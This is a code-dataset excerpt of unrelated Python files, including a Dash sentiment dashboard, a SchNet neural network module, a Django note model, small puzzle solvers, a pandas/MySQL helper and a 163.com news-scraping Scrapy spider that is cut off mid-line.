dt.strptime(sdate, '%d/%m/%Y').date()\r\n df = df.loc[filter]\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n labels = ['Positive Tweets', 'Negative Tweets', 'Neutral Tweets']\r\n values = [p, n, nt]\r\n\r\n title = 'Statistics of ' + sphase\r\n fig = go.Figure(data=[go.Pie(labels=labels, values=values, textinfo='label+percent',\r\n insidetextorientation='radial',\r\n marker_colors=['rgb(35,132,67)', 'rgb(244,59,44)', 'rgb(62,83,160)']\r\n )])\r\n\r\n fig.update_traces(textposition='inside')\r\n fig.update_layout(template='plotly_dark',\r\n #paper_bgcolor='rgba(0,0,0,0)',\r\n #plot_bgcolor='rgba(0,0,0,0)',\r\n #xaxis_showgrid=False,\r\n #yaxis_showgrid=False,\r\n font=dict(\r\n family='Raleway, sans-serif',\r\n size = 15,\r\n color=\"RebeccaPurple\"),\r\n title={\r\n 'text': title,\r\n 'y':0.95, 'x':0.5,\r\n 'xanchor': 'center', 'yanchor': 'top'}\r\n )\r\n fig.update_layout(margin=dict(t=80, b=20, l=0, r=0))\r\n\r\n return fig\r\n\r\ndef date2str(sdate):\r\n #tdate = dt.strptime(sdate, '%Y-%m-%d').date()\r\n tdate = sdate.strftime(\"%d-%b-%Y\")\r\n return tdate\r\n\r\n# show phase stats\r\n@app.callback(\r\n output=Output(\"phasestats\", \"children\"),\r\n inputs=[Input(\"phase-dropdown\", \"value\")]\r\n)\r\ndef update_pstats(val):\r\n df = df_phase\r\n filter = [False, False, False, False, False, False]\r\n filter[val]=True\r\n sphase = phases[val]\r\n df = df.loc[filter]\r\n\r\n p = df.iloc[0].pos\r\n n = df.iloc[0].neg\r\n nt = df.iloc[0].neut\r\n av = df.iloc[0].avg\r\n dp = df.iloc[0]['date_mpos']\r\n dn = df.iloc[0]['date_mneg']\r\n pn = df.iloc[0]['p/n']*1000\r\n st = df.iloc[0].start\r\n ed = df.iloc[0].end\r\n drn = ed-st\r\n #dt.strptime(ed, '%Y-%m-%d').date() - dt.strptime(st, '%Y-%m-%d').date()\r\n\r\n dp = date2str(dp)\r\n dn = 
date2str(dn)\r\n st = date2str(st)\r\n ed = date2str(ed)\r\n title = 'Statistics of ' + sphase\r\n\r\n return [\r\n html.H3(title),\r\n html.P('The ' + sphase + ' started on : ' + st + ' and ended on : ' + ed),\r\n html.P('Total duration of ' + sphase + ' : ' + str(drn)),\r\n #html.P('Total count of positive tweets in ' + sphase + ' : ' + str(p)),\r\n #html.P('Total count of negative tweets in ' + sphase + ' : ' + str(n)),\r\n #html.P('Total count of neutral tweets in ' + sphase + ' : ' + str(nt)),\r\n html.P('Average Sentiment Score of tweets in ' + sphase + ' : ' + str(av)),\r\n html.P('Total positive tweets per 1k negative tweets in ' + sphase + ' : ' + str(round(pn))),\r\n html.P('Date with highest p/n ratio in ' + sphase + ' : ' + dp),\r\n html.P('Date with lowest p/n ratio in ' + sphase + ' : ' + dn)\r\n ]\r\n\r\n\r\n# Running the server\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True, port=8050)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":30490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"233769307","text":"from PyQt5 import QtCore,QtGui,QtWidgets\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use(\"Qt5Agg\")\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n\nclass SensorDataCanvas(FigureCanvas):\n\n def __init__(self):\n plt.style.use('ggplot')\n self.fig = Figure(figsize=(8,4), dpi=100)\n self.fig.subplots_adjust(left=0.15, bottom=0.2, right=0.95, top=0.95, hspace=0.2, wspace=0.2)\n #self.fig = Figure()\n self.ax = self.fig.add_subplot(111)\n FigureCanvas.__init__(self, self.fig)\n FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n prefer_color = '#8F5429'\n self.ax.set_xlabel(\"Times\", fontdict=dict(fontsize=16, fontweight='bold', color=prefer_color))\n self.ax.set_ylabel(\"Data\", fontdict=dict(fontsize=16, fontweight='bold', color=prefer_color))\n\n #self.ax.legend()\n self.ax.set_ylim(-180, 180)\n self.ax.grid(True)\n \n self.curveObj = None\n\n def plot(self, datax, datay):\n if self.curveObj is None:\n self.curveObj, = self.ax.plot(np.array(datax), np.array(datay), 'o-', color='#DB6756')\n else:\n self.curveObj.set_data(np.array(datax), np.array(datay))\n try:\n self.ax.set_xlim(datax[0], datax[-1])\n except IndexError:\n pass\n self.draw()\n\n\n def clear(self):\n self.plot([],[])\n\n def set_ylim(self, low_bound, up_bound):\n self.ax.set_ylim(low_bound, up_bound)","sub_path":"sensor_data_canvas.py","file_name":"sensor_data_canvas.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"295378823","text":"import string\n\ndef getTriangle(n):\n return int(0.5*n*(n+1))\n\ndef getWordValue(word):\n value = 0\n for char in word.lower():\n value += ord(char) - 96\n return value\n\ndef isTriangleWord(word):\n wordValue = getWordValue(word)\n n = 1\n while(getTriangle(n) < wordValue):\n n += 1\n if(getTriangle(n) == wordValue):\n return True\n return False\n\nwith open('files_42/p042_words.txt') as file:\n lines = file.readlines()\n\ntriangleWords = 0\n\nfor line in lines:\n for word in [word for word in line.split('\"') if word != ',']:\n if(isTriangleWord(word)):\n triangleWords += 
1\n\nprint(triangleWords)\n","sub_path":"42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"84082293","text":"import sys\n\n# Given a list of ints 1 through n missing one element, \n# print that element.\n\ndef findMissing(lst):\n\tn = len(lst)\n\ti = 0\n\tans = 0\n\twhile i < n:\n\t\tans ^= ((i+1) ^ lst[i])\n\t\ti+=1\n\tans ^= (n+1)\n\treturn ans if ans <= n else None\n\n# lst = [int(x) for x in sys.argv[1:]]\n# print findMissing(lst)","sub_path":"other/missingInt.py","file_name":"missingInt.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"461941446","text":"import MySQLdb\nimport base64\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom MySQLdb import Error\nfrom io import BytesIO\n\n\nclass DataBase:\n \"\"\"\n Initialises MySQL database connection.\n\n \"\"\"\n def connect_db(self, addr, uname, psswd, dbname):\n \"\"\"\n Establish DB connection.\n \"\"\"\n try:\n db = MySQLdb.connect(\n addr,\n uname,\n psswd,\n dbname,\n )\n if db:\n print('Connected to db: \\n', db.get_server_info())\n return db\n\n except Error as e:\n print('Database connection failed:', e)\n\n\nclass DataFrameMaker:\n\n \"\"\"\n Sends a query to database,\n reads query-data with pandas method,\n builds tables or plots based on received query-data\n \"\"\"\n\n def __init__(self, db, query):\n \"\"\"Accepts database and query, creates dataframe\"\"\"\n self.db = db\n self.query = query\n self.df = pd.read_sql(self.query, self.db)\n\n def get_frame(self, html=False):\n \"\"\"Return whole table dataframe\"\"\"\n if html:\n return self.df.to_html()\n return self.df\n\n def get_nunique_messages(self, html=False):\n \"\"\"Return dataframe with a number of non-unique messages\"\"\"\n if html:\n df = pd.DataFrame(self.df.nunique())\n return df.to_html()\n return self.df.nunique()\n\n def get_last_messages(self, num, html=False):\n \"\"\"Return number of last messages\"\"\"\n if html:\n return self.df.tail(num).to_html()\n return self.df.tail(num)\n\n def get_plot(self, html=False):\n \"\"\"Processes and returns plot image.\"\"\"\n if html:\n\n ### stack overflow solution ###\n ### https://stackoverflow.com/questions/17551956/python-given-a-bytesio-buffer-generate-img-tag-in-html ###\n self.df.plot()\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n image_png = buffer.getvalue()\n buffer.close()\n graphic = base64.b64encode(image_png)\n graphic = graphic.decode('utf-8')\n\n return graphic\n\n return self.df.plot()\n","sub_path":"psqli/psqli.py","file_name":"psqli.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"237866230","text":"import math\nimport itertools\n\nimport torch\nimport torch.nn as nn\n\nimport schnetpack.nn.acsf\nimport schnetpack.nn.activations\nimport schnetpack.nn.base\nimport schnetpack.nn.cfconv\nimport schnetpack.nn.neighbors\nfrom schnetpack.data import Structure\nfrom schnetpack.nn.cutoff import HardCutoff\n\n\nclass SchNetInteraction(nn.Module):\n \"\"\"\n SchNet interaction block for modeling quantum interactions of atomistic\n systems with cosine cutoff.\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_spatial_basis (int): number of input features of filter-generating networks\n n_filters (int): number of 
filters used in continuous-filter convolution\n normalize_filter (bool): if true, divide filter by number of neighbors over which convolution is applied\n \"\"\"\n\n def __init__(self, n_atom_basis, n_spatial_basis, n_filters, cutoff,\n cutoff_network=HardCutoff, normalize_filter=False):\n super(SchNetInteraction, self).__init__()\n\n # initialize filters\n self.filter_network = nn.Sequential(\n schnetpack.nn.base.Dense(n_spatial_basis, n_filters,\n activation=schnetpack.nn.activations.shifted_softplus),\n schnetpack.nn.base.Dense(n_filters, n_filters)\n )\n\n self.cutoff_network = cutoff_network(cutoff)\n\n # initialize interaction blocks\n self.cfconv = schnetpack.nn.cfconv.CFConv(n_atom_basis, n_filters,\n n_atom_basis,\n self.filter_network,\n cutoff_network=self.cutoff_network,\n activation=schnetpack.nn.activations.shifted_softplus,\n normalize_filter=normalize_filter)\n self.dense = schnetpack.nn.base.Dense(n_atom_basis, n_atom_basis)\n\n def forward(self, x, r_ij, neighbors, neighbor_mask, f_ij=None):\n \"\"\"\n Args:\n x (torch.Tensor): Atom-wise input representations.\n r_ij (torch.Tensor): Interatomic distances.\n neighbors (torch.Tensor): Indices of neighboring atoms.\n neighbor_mask (torch.Tensor): Mask to indicate virtual neighbors\n introduced via zeros padding.\n f_ij (torch.Tensor): Use at your own risk.\n\n Returns:\n torch.Tensor: SchNet representation.\n \"\"\"\n v = self.cfconv(x, r_ij, neighbors, neighbor_mask, f_ij)\n v = self.dense(v)\n return v\n\nclass SchNetEdgeUpdate(nn.Module):\n \"\"\"\n SchNet edge update network for updating the representation of interactions.\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_spatial_basis (int): number of features for distance representation\n \"\"\"\n\n def __init__(self, n_atom_basis, n_spatial_basis, hidden_size=None):\n super(SchNetEdgeUpdate, self).__init__()\n\n if not hidden_size:\n h_size = 2*n_spatial_basis\n else:\n h_size = hidden_size\n\n self.edge_network = nn.Sequential(\n schnetpack.nn.base.Dense(2*n_atom_basis+n_spatial_basis, h_size,\n activation=schnetpack.nn.activations.shifted_softplus),\n schnetpack.nn.base.Dense(h_size, n_spatial_basis)\n )\n\n def forward(self, x, neighbors, f_ij):\n\n # Expected dimensions:\n # x (bs x n_at x n_atom_basis)\n # neighbors (bs x n_at x n_neigh)\n # f_ij (bs x n_at x n_neigh x n_spatial_basis)\n\n # Construct auxiliary index vector\n n_batch = x.size()[0]\n idx_m = torch.arange(n_batch, device=x.device, dtype=torch.long)[:,\n None, None]\n # Gather representations of all neighors\n x_neighbors = x[idx_m, neighbors, :]\n\n # Expand atom representation\n n_neighbors = neighbors.size()[2]\n x_expand = x[:,:,None,:].expand(-1, -1, n_neighbors, -1)\n\n # Concatenate edge representation, sending atom, and receiving atom\n edge_network_input = torch.cat((f_ij, x_neighbors, x_expand), 3)\n\n # Compute new edge representation\n f_ij_new = self.edge_network(edge_network_input)\n\n return f_ij_new\n\n\nclass SchNet(nn.Module):\n \"\"\"\n SchNet architecture for learning representations of atomistic systems\n as described in [#schnet1]_ [#schnet_transfer]_ [#schnet3]_\n\n Args:\n n_atom_basis (int): number of features used to describe atomic environments\n n_filters (int): number of filters used in continuous-filter convolution\n n_interactions (int): number of interaction blocks\n cutoff (float): cutoff radius of filters\n n_gaussians (int): number of Gaussians which are used to expand atom distances\n normalize_filter (bool): if true, 
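The filter_network built in SchNetInteraction is a two-layer MLP that turns an expanded distance into a per-pair filter. A hedged standalone sketch of that shape of computation follows; it is not SchNetPack's actual CFConv (nn.Softplus stands in for shifted_softplus, and all sizes are example values):

```python
import torch
import torch.nn as nn

n_spatial_basis, n_filters = 25, 128
filter_net = nn.Sequential(
    nn.Linear(n_spatial_basis, n_filters),
    nn.Softplus(),  # stand-in for shifted_softplus
    nn.Linear(n_filters, n_filters),
)

# batch x atoms x neighbors x basis -> one filter per atom pair
f_ij = torch.rand(4, 10, 8, n_spatial_basis)
W = filter_net(f_ij)
neighbor_feats = torch.rand(4, 10, 8, n_filters)
message = (W * neighbor_feats).sum(dim=2)  # unnormalized continuous-filter convolution
print(message.shape)  # torch.Size([4, 10, 128])
```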
divide filter by number of neighbors\n over which convolution is applied\n coupled_interactions (bool): if true, share the weights across\n interaction blocks and filter-generating networks.\n return_intermediate (bool): if true, also return intermediate feature\n representations after each interaction block\n max_z (int): maximum allowed nuclear charge in dataset. This determines\n the size of the embedding matrix.\n\n References\n ----------\n .. [#schnet1] Schütt, Arbabzadah, Chmiela, Müller, Tkatchenko:\n Quantum-chemical insights from deep tensor neural networks.\n Nature Communications, 8, 13890. 2017.\n .. [#schnet_transfer] Schütt, Kindermans, Sauceda, Chmiela, Tkatchenko, Müller:\n SchNet: A continuous-filter convolutional neural network for modeling quantum interactions.\n In Advances in Neural Information Processing Systems, pp. 992-1002. 2017.\n .. [#schnet3] Schütt, Sauceda, Kindermans, Tkatchenko, Müller:\n SchNet - a deep learning architecture for molceules and materials.\n The Journal of Chemical Physics 148 (24), 241722. 2018.\n \"\"\"\n\n def __init__(self, n_atom_basis=128, n_filters=128, n_interactions=1,\n cutoff=5.0, n_gaussians=25,\n normalize_filter=False, coupled_interactions=False,\n return_intermediate=False, max_z=100,\n cutoff_network=HardCutoff, trainable_gaussians=False,\n distance_expansion=None, charged_systems=False,\n trainable_edges=False):\n super(SchNet, self).__init__()\n\n # atom type embeddings\n scale = 1. / math.sqrt(n_atom_basis)\n embedding_init = torch.randn(max_z, n_atom_basis)*scale\n self.embedding = nn.Embedding(max_z, n_atom_basis, padding_idx=0, _weight=embedding_init)\n\n # spatial features\n self.distances = schnetpack.nn.neighbors.AtomDistances()\n if distance_expansion is None:\n self.distance_expansion = schnetpack.nn.acsf.GaussianSmearing(\n 0.0, cutoff, n_gaussians, trainable=trainable_gaussians)\n else:\n self.distance_expansion = distance_expansion\n\n self.return_intermediate = return_intermediate\n\n self.charged_systems = charged_systems\n if charged_systems:\n self.charge = nn.Parameter(torch.Tensor(1, n_atom_basis))\n self.charge.data.normal_(0, 1. 
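GaussianSmearing(0.0, cutoff, n_gaussians) expands each interatomic distance onto a grid of radial basis functions. A minimal sketch of that expansion; the width choice (one over the squared grid spacing) is an assumption here, not necessarily SchNetPack's default:

```python
import torch

def gaussian_smearing(r_ij, cutoff=5.0, n_gaussians=25):
    # evenly spaced Gaussian centers on [0, cutoff]
    centers = torch.linspace(0.0, cutoff, n_gaussians)
    gamma = 1.0 / (centers[1] - centers[0]) ** 2  # assumed width
    return torch.exp(-gamma * (r_ij.unsqueeze(-1) - centers) ** 2)

expanded = gaussian_smearing(torch.tensor([[1.2, 3.4]]))
print(expanded.shape)  # torch.Size([1, 2, 25])
```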
/ math.sqrt(n_atom_basis))\n\n        # interaction network\n        if coupled_interactions:\n            self.interactions = nn.ModuleList(\n                [\n                    SchNetInteraction(\n                        n_atom_basis=n_atom_basis,\n                        n_spatial_basis=n_gaussians,\n                        n_filters=n_filters,\n                        cutoff_network=cutoff_network,\n                        cutoff=cutoff,\n                        normalize_filter=normalize_filter)\n                ] * n_interactions)\n        else:\n            self.interactions = nn.ModuleList([\n                SchNetInteraction(n_atom_basis=n_atom_basis,\n                                  n_spatial_basis=n_gaussians,\n                                  n_filters=n_filters,\n                                  cutoff_network=cutoff_network,\n                                  cutoff=cutoff,\n                                  normalize_filter=normalize_filter)\n                for _ in range(n_interactions)\n            ])\n        # edge update network\n        if trainable_edges:\n            if coupled_interactions:\n                self.edge_updates = nn.ModuleList([\n                    SchNetEdgeUpdate(n_atom_basis, n_gaussians)\n                ] * n_interactions)\n            else:\n                self.edge_updates = nn.ModuleList([\n                    SchNetEdgeUpdate(n_atom_basis, n_gaussians)\n                    for _ in range(n_interactions)])\n        else:\n            self.edge_updates = []\n\n\n    def forward(self, inputs):\n        \"\"\"\n        Args:\n            inputs (dict of torch.Tensor): SchNetPack format dictionary of input tensors.\n\n        Returns:\n            torch.Tensor: Final Atom-wise SchNet representation.\n            torch.Tensor: Atom-wise SchNet representation of intermediate layers.\n        \"\"\"\n        atomic_numbers = inputs[Structure.Z]\n        positions = inputs[Structure.R]\n        cell = inputs[Structure.cell]\n        cell_offset = inputs[Structure.cell_offset]\n        neighbors = inputs[Structure.neighbors]\n        neighbor_mask = inputs[Structure.neighbor_mask]\n        atom_mask = inputs[Structure.atom_mask]\n\n        # atom embedding\n        x = self.embedding(atomic_numbers)\n\n        if False and self.charged_systems and Structure.charge in inputs.keys():\n            n_atoms = torch.sum(atom_mask, dim=1, keepdim=True)\n            charge = inputs[Structure.charge] / n_atoms # B\n            charge = charge[:, None] * self.charge # B x F\n            x = x + charge\n\n        # spatial features\n        r_ij = self.distances(positions, neighbors, cell, cell_offset,\n                              neighbor_mask=neighbor_mask)\n        f_ij = self.distance_expansion(r_ij)\n\n        # interactions\n        if self.return_intermediate:\n            xs = [x]\n\n        for edge_update, interaction in itertools.zip_longest(self.edge_updates, self.interactions):\n            if edge_update:\n                f_ij = edge_update(x, neighbors, f_ij)\n            v = interaction(x, r_ij, neighbors, neighbor_mask, f_ij=f_ij)\n            x = x + v\n\n            if self.return_intermediate:\n                xs.append(x)  # record this layer's representation (was appending the list to itself)\n\n        if self.return_intermediate:\n            return x, xs\n        return x\n","sub_path":"src/schnetpack/representation/schnet.py","file_name":"schnet.py","file_ext":"py","file_size_in_byte":10648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"318384716","text":"from django.db import models\nfrom django.conf import settings\nfrom uuid import uuid4\nfrom django.db import IntegrityError\n\nfrom random import choice\nfrom string import ascii_lowercase\nfrom django.utils import timezone\n\n\nclass Note(models.Model):\n    id = models.CharField(primary_key=True, unique=True, max_length=8)\n    owner = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='notes', to_field='email',\n                              on_delete=models.CASCADE)\n    topic = models.CharField(max_length=30)\n    text = models.TextField(max_length=4092, blank=True, null=True)\n    created_date = models.DateTimeField(auto_now_add=True, editable=False)\n    last_edit = models.DateTimeField(blank=True, null=True)\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.__topic = self.topic\n        self.__text = self.text\n\n    def save(self, *args, **kwargs):\n        def _get_random_string(length):\n            letters = ascii_lowercase\n            result_str = 
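forward() pairs edge-update modules with interaction blocks via itertools.zip_longest, so an empty self.edge_updates still visits every interaction. A tiny standalone illustration of that pairing:

```python
from itertools import zip_longest

edge_updates = []  # trainable_edges=False leaves this empty
interactions = ['interaction0', 'interaction1', 'interaction2']
for edge_update, interaction in zip_longest(edge_updates, interactions):
    # zip_longest pads the shorter list with None, which is falsy,
    # so the `if edge_update:` branch above is simply skipped
    assert edge_update is None
    print(interaction)
```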
''.join(choice(letters) for i in range(length))\n            return result_str\n\n        if not self.id:\n            self.id = _get_random_string(8)\n            # using your function as above or anything else\n        if self.__topic != self.topic or self.__text != self.text:\n            self.last_edit = timezone.now()\n        success = False\n        failures = 0\n        while not success:\n            try:\n                super(Note, self).save(*args, **kwargs)\n            except IntegrityError:\n                failures += 1\n                if failures > 5: # or some other arbitrary cutoff point at which things are clearly wrong\n                    raise\n                else:\n                    # looks like a collision, try another random value\n                    self.id = _get_random_string(8)\n            else:\n                success = True\n","sub_path":"notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474750902","text":"import pprint\n\n\n# Apply zero padding around the whole of the given grid\ndef add_padding(grid):\n    max_col, max_row = len(grid[0]), len(grid)\n\n    # prepend a row of all zeros\n    pad_grid = [[0 for x in range(max_col+2)]]\n\n    # append a 0 at the right edge and insert one at the left edge\n    for r in range(max_row):\n        r_list_grid = list(grid[r])\n        r_list_grid.append(0)\n        r_list_grid.insert(0, 0)\n        pad_grid.append(r_list_grid)\n\n    # append a row of all zeros at the end\n    pad_grid.append([0 for x in range(max_col+2)])\n\n    return pad_grid\n\n\n# Count the \"1\"s surrounding the target coordinate\ndef count_neighbours_pad(grid, target_row, target_col):\n    count = 0\n\n    for row in range(-1, 2):\n        for col in range(-1, 2):\n            if row == 0 and col == 0:\n                pass\n            else:\n                count += grid[target_row + row][target_col + col]\n    # print(count)\n    \n    return count\n\n\ndef count_neighbours(grid, row, col):\n    pad_grid = add_padding(grid)\n    # pprint.pprint(pad_grid)\n\n    row_after_pad = row + 1\n    col_after_pad = col + 1\n\n    answer = count_neighbours_pad(pad_grid, row_after_pad, col_after_pad)\n    return answer\n\n\nif __name__ == '__main__':\n    # These \"asserts\" are used only for self-checking and are not necessary for auto-testing\n    assert count_neighbours(((1, 0, 0, 1, 0),\n                             (0, 1, 0, 0, 0),\n                             (0, 0, 1, 0, 1),\n                             (1, 0, 0, 0, 0),\n                             (0, 0, 1, 0, 0),), 1, 2) == 3, \"1st example\"\n    assert count_neighbours(((1, 0, 0, 1, 0),\n                             (0, 1, 0, 0, 0),\n                             (0, 0, 1, 0, 1),\n                             (1, 0, 0, 0, 0),\n                             (0, 0, 1, 0, 0),), 0, 0) == 1, \"2nd example\"\n    assert count_neighbours(((1, 1, 1),\n                             (1, 1, 1),\n                             (1, 1, 1),), 0, 2) == 3, \"Dense corner\"\n    assert count_neighbours(((0, 0, 0),\n                             (0, 1, 0),\n                             (0, 0, 0),), 1, 1) == 0, \"Single\"\n\n\n\n","sub_path":"MooreNeighbourhood.py","file_name":"MooreNeighbourhood.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"36991779","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\nimport scrapy\nfrom cctv_OpinionMonitor2 import helper\nfrom cctv_OpinionMonitor2.items import CctvOpinionmonitor2Item\nfrom scrapy.http import Request\n\n# # Top news feed\n# 'http://c.m.163.com/dlist/article/dynamic?{}'\n# par = {\n#     'from':'T1467284926140',\n#     'offset':'0',\n#     'size':'20',\n#     'fn':'1',\n#     'LastStdTime':'0',\n#     'passport':'',\n#     'devId':'UtQj6VTqfPTNdHOhqXgx4w%3D%3D',\n#     # 'lat':'nEob1URk2zlHby%2FZRQvN9A%3D%3D',\n#     # 'lon':'gnbXwKYIXyBHzMQxFSRSxQ%3D%3D',\n#     'version':'54.6',\n#     'net':'wifi',\n#     # 'ts':'1556091859',\n#     # 'sign':'uqtTuIyP5oD9HzgvKRKuccyK81gp7LyGqaF2wqK%2F62B48ErR02zJ6%2FKXOnxX046I',\n#     'encryption':'1',\n#     'canal':'miliao_news',\n#     # 'mac':'I0hRorjreoVkNP82fbwMpUn4xdWy8S3keUAmEYPgEfc%3D',\n#     # 'open':'',\n#     # 'openpath':''\n# }\n#\n# # Recommended feed\n# 'http://c.m.163.com/recommend/getSubDocPic?{}'\n# par2 = {\n#     # 
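add_padding in MooreNeighbourhood.py is the hand-rolled equivalent of constant-mode padding; if numpy were acceptable for that exercise, the same border could be produced in one call (a cross-check, not a required change):

```python
import numpy as np

grid = ((1, 0), (0, 1))
padded = np.pad(np.array(grid), pad_width=1, mode='constant', constant_values=0)
print(padded)
# [[0 0 0 0]
#  [0 1 0 0]
#  [0 0 1 0]
#  [0 0 0 0]]
```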
'tid':'T1348647909107',\n# 'from':'toutiao',\n# 'offset':'0',\n# 'size':'10',\n# 'fn':'3',\n# 'LastStdTime':'0',\n# 'spestr':'reader_expert_1',\n# # 'prog':'bjrec_toutiaotoutiao-1100000423-1200000585-1110000662-1111000458-1111000774-1111000698-1111000797-1111000478-1111000673-1200000742-1200000685-1200000604-1111000619-1200000724-1111000438-1111000834-1111000592-1111000394-1111000589-1200000673-1111000545-1200000594-1111000543-1200000710-1200000677-1200000632-1111000289-1111000388-1111000242-1200000576-1200000652-1111000828-1111000729-1200000734-1111000629-1200000678-1111000626-1111000701-1111000548e',\n# 'passport':'',\n# 'devId':'UtQj6VTqfPTNdHOhqXgx4w%3D%3D',\n# # 'lat':'nEob1URk2zlHby%2FZRQvN9A%3D%3D',\n# # 'lon':'gnbXwKYIXyBHzMQxFSRSxQ%3D%3D',\n# 'version':'54.6',\n# 'net':'wifi',\n# # 'ts':'1556095657',\n# # 'sign':'QKcKkwKuzkBU7u6u%2B67TXuGGUbk990WpvAlMfaMcqUx48ErR02zJ6%2FKXOnxX046I',\n# 'encryption':'1',\n# 'canal':'miliao_news',\n# # 'mac':'I0hRorjreoVkNP82fbwMpUn4xdWy8S3keUAmEYPgEfc%3D',\n# # 'open':'',\n# # 'openpath':''\n# }\n# 不需要headers\n\n# 'http://c.m.163.com/nc/article/list/T1414142214384/{}-20.html'\n# 需要headers\n\nclass A163ComSpider(scrapy.Spider):\n name = '163.com'\n limittime = '2018-01-01'\n\n entry_point = {\n '要闻': 'http://c.m.163.com/dlist/article/dynamic?from=T1467284926140&offset=0&size=20&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=54.6&net=wifi&encryption=1&canal=miliao_news',\n '头条': 'http://c.m.163.com/recommend/getSubDocPic?from=T1467284926140&offset=0&size=20&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=54.6&net=wifi&encryption=1&canal=miliao_news',\n '财经': 'http://c.m.163.com/dlist/article/dynamic?from=T1348648756099&offset=0&size=10&fn=1&LastStdTime=0&passport=&devId=UtQj6VTqfPTNdHOhqXgx4w%3D%3D&version=55.1&net=wifi&encryption=1&canal=miliao_news&open=&openpath=',\n '新时代': 'http://c.m.163.com/nc/article/list/T1414142214384/0-20.html'\n }\n\n headers = {\n 'User-Agent': 'NewsApp/54.6 Android/4.4.4 (Xiaomi/MI 3C)'\n }\n\n def start_requests(self):\n for key in self.entry_point.keys():\n yield Request(url=self.entry_point[key], callback=self.yaowen_parse, headers=self.headers, dont_filter=True)\n\n def caijing_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1348648756099']) == 0: return\n for item in jsonbd['T1348648756099']:\n if 'postid' not in item.keys() or len(item['postid']) == 0: continue\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n title = item['title'] if 'title' in item.keys() else None\n url = 'http://c.m.163.com/nc/article/preload/{}/full.html'.format(id)\n yield Request(url=url, callback=self.content2_parse, encoding='utf-8', headers=self.headers,\n meta={'date': date, 'id': id, 'source': source, 'title':title})\n\n def newtime_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1414142214384']) == 0: return\n for item in jsonbd['T1414142214384']:\n if 'url_3w' not in item.keys() or len(item['url_3w']) == 0: continue\n url = item['url_3w']\n like = item['votecount'] if 'votecount' in item.keys() else None\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n replyCount = item['replyCount'] if 'replyCount' in item.keys() else None\n yield Request(url=url, 
callback=self.content_parse, encoding='utf-8', meta={'like':like,'id':id,'date':date,'replyCount':replyCount,'source':source})\n\n def yaowen_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['T1467284926140']) == 0: return\n for item in jsonbd['T1467284926140']:\n if 'url_3w' not in item.keys() or len(item['url_3w']) == 0: continue\n url = item['url_3w']\n like = item['votecount'] if 'votecount' in item.keys() else None\n id = item['postid'] if 'postid' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n replyCount = item['replyCount'] if 'replyCount' in item.keys() else None\n yield Request(url=url, callback=self.content_parse, encoding='utf-8', meta={'like':like,'id':id,'date':date,'replyCount':replyCount,'source':source})\n\n def toutiao_parse(self, response):\n jsonbd = json.loads(response.text)\n if len(jsonbd['推荐']) == 0: return\n for item in jsonbd['推荐']:\n if 'id' not in item.keys() or len(item['id']) == 0: continue\n id = item['id'] if 'id' in item.keys() else None\n date = item['ptime'] if 'ptime' in item.keys() else None\n source = item['source'] if 'source' in item.keys() else None\n title = item['title'] if 'title' in item.keys() else None\n url = 'http://c.m.163.com/nc/article/preload/{}/full.html'.format(id)\n yield Request(url=url, callback=self.content2_parse, encoding='utf-8', headers=self.headers,meta={'date':date,'id':id,'source':source,'title':title})\n\n def content_parse(self, response):\n date = response.meta['date']\n if date == None or len(date) == 0: return\n try:\n if helper.compare_time(date, self.limittime) < 0: return\n except:\n return\n\n pipleitem = CctvOpinionmonitor2Item()\n\n pipleitem['date'] = helper.formatTime(date)\n pipleitem['id'] = response.meta['id']\n pipleitem['url'] = response.url\n pipleitem['title'] = response.css('title::text').extract_first()\n pipleitem['source'] = response.meta['source']\n pipleitem['editor'] = None\n # pipleitem['content'] = helper.list2str(response.xpath('string(//div[@class=\"QuestionHeader-detail\"])').extract())\n pipleitem['content'] = 